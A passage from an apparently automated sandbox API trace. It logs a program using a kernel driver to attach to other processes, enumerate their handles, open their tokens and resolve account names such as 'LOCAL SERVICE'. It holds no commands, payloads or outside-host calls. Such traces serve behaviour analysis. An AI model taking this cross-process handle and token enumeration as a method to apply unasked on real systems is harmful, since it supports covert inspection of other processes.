HandleInformation=0x0) returned 0x0 [0246.590] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.590] PsReleaseProcessExitSynchronization () returned 0x2 [0246.590] ObfDereferenceObject (Object=0xfffffa8001e9eb30) returned 0x3b [0246.590] ObQueryNameString (in: Object=0xfffffa8001e8d9e0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.590] ObfDereferenceObject (Object=0xfffffa8001e8d9e0) returned 0x1 [0246.590] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.590] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x730) returned 0xc8 [0246.590] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.590] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80021a89d0, HandleInformation=0x0) returned 0x0 [0246.590] ObOpenObjectByPointer (in: Object=0xfffffa80021a89d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.590] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x20 [0246.590] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8003ab1940 | out: TokenHandle=0xfffffa8003ab1940*=0xc4) returned 0x0 [0246.590] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.590] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.590] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.590] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.592] CloseHandle (hObject=0xc4) returned 1 [0246.592] CloseHandle (hObject=0xc8) returned 1 [0246.592] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.592] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0246.592] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.592] PsAcquireProcessExitSynchronization () returned 0x0 [0246.592] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0) [0246.593] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ee2c70, HandleInformation=0x0) returned 0x0 [0246.593] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.593] PsReleaseProcessExitSynchronization () returned 0x2 [0246.593] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0246.593] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.593] ObfDereferenceObject (Object=0xfffffa8001ee2c70) returned 0x1 [0246.593] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.593] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.593] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.593] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0246.593] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.593] PsAcquireProcessExitSynchronization () returned 0x0 [0246.593] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0) [0246.593] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002160c00, HandleInformation=0x0) returned 0x0 [0246.593] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.593] PsReleaseProcessExitSynchronization () returned 0x2 [0246.593] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0246.593] ObQueryNameString (in: Object=0xfffffa8002160c00, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.593] ObfDereferenceObject (Object=0xfffffa8002160c00) returned 0x1 [0246.593] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.593] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.593] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.593] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.593] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.593] PsAcquireProcessExitSynchronization () returned 0x0 [0246.594] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0) [0246.594] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.594] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.594] PsReleaseProcessExitSynchronization () returned 0x2 [0246.594] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0246.594] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.594] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x51 [0246.594] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.594] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.594] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.594] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0246.594] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.594] PsAcquireProcessExitSynchronization () returned 0x0 [0246.594] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0) [0246.594] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80027ed140, HandleInformation=0x0) returned 0x0 [0246.594] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.594] PsReleaseProcessExitSynchronization () returned 0x2 [0246.594] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0246.594] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.594] ObfDereferenceObject (Object=0xfffffa80027ed140) returned 0x1 [0246.594] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.594] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.594] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.594] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.594] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.594] PsAcquireProcessExitSynchronization () returned 0x0 [0246.595] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0) [0246.595] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00191dd00, HandleInformation=0x0) returned 0x0 [0246.595] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.595] PsReleaseProcessExitSynchronization () returned 0x2 [0246.595] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0246.595] ObQueryNameString (in: Object=0xfffff8a00191dd00, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.595] ObfDereferenceObject (Object=0xfffff8a00191dd00) returned 0x1 [0246.595] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.595] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.595] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.595] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0246.595] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.595] PsAcquireProcessExitSynchronization () returned 0x0 [0246.595] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0) [0246.595] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800218c070, HandleInformation=0x0) returned 0x0 [0246.595] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.595] PsReleaseProcessExitSynchronization () returned 0x2 [0246.595] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0246.595] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.595] ObfDereferenceObject (Object=0xfffffa800218c070) returned 0x1 [0246.595] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.595] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.595] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.596] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0246.596] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.596] PsAcquireProcessExitSynchronization () returned 0x0 [0246.596] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0) [0246.596] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800218eba0, HandleInformation=0x0) returned 0x0 [0246.596] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.596] PsReleaseProcessExitSynchronization () returned 0x2 [0246.596] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0246.596] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.596] ObfDereferenceObject (Object=0xfffffa800218eba0) returned 0x1 [0246.596] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.596] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.596] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.596] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0246.596] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.596] PsAcquireProcessExitSynchronization () returned 0x0 [0246.596] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0) [0246.596] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0246.596] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.596] PsReleaseProcessExitSynchronization () returned 0x2 [0246.596] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0246.596] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.596] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0246.596] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.596] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.597] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.597] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0246.597] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.597] PsAcquireProcessExitSynchronization () returned 0x0 [0246.597] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0) [0246.597] ObReferenceObjectByHandle (in: Handle=0xd8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020ab3a0, HandleInformation=0x0) returned 0x0 [0246.597] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.597] PsReleaseProcessExitSynchronization () returned 0x2 [0246.597] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0246.597] ObQueryNameString (in: Object=0xfffffa80020ab3a0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.597] ObfDereferenceObject (Object=0xfffffa80020ab3a0) returned 0x1 [0246.597] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.597] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.597] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.597] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0246.597] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.597] PsAcquireProcessExitSynchronization () returned 0x0 [0246.597] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0) [0246.597] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0246.597] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.597] PsReleaseProcessExitSynchronization () returned 0x2 [0246.597] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0246.597] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.597] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0246.597] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.598] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.598] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.598] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0246.598] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.598] PsAcquireProcessExitSynchronization () returned 0x0 [0246.598] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880053c85d0) [0246.598] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0246.598] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.598] PsReleaseProcessExitSynchronization () returned 0x2 [0246.598] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0246.598] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.598] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xa [0246.598] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.598] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa74) returned 0xc8 [0246.598] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.598] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002345b30, HandleInformation=0x0) returned 0x0 [0246.598] ObOpenObjectByPointer (in: Object=0xfffffa8002345b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.598] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x24 [0246.598] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8003ab1940 | out: TokenHandle=0xfffffa8003ab1940*=0xc4) returned 0x0 [0246.598] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.598] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.599] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.599] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.600] CloseHandle (hObject=0xc4) returned 1 [0246.601] CloseHandle (hObject=0xc8) returned 1 [0246.601] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.601] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0246.601] PsLookupProcessByProcessId (in: ProcessId=0xa74, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.601] PsAcquireProcessExitSynchronization () returned 0x0 [0246.601] KeStackAttachProcess (in: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880053c85d0) [0246.601] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80023a8670, HandleInformation=0x0) returned 0x0 [0246.601] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.601] PsReleaseProcessExitSynchronization () returned 0x2 [0246.601] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x22 [0246.601] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.601] ObfDereferenceObject (Object=0xfffffa80023a8670) returned 0x1 [0246.601] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.601] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.601] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.601] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0246.601] PsLookupProcessByProcessId 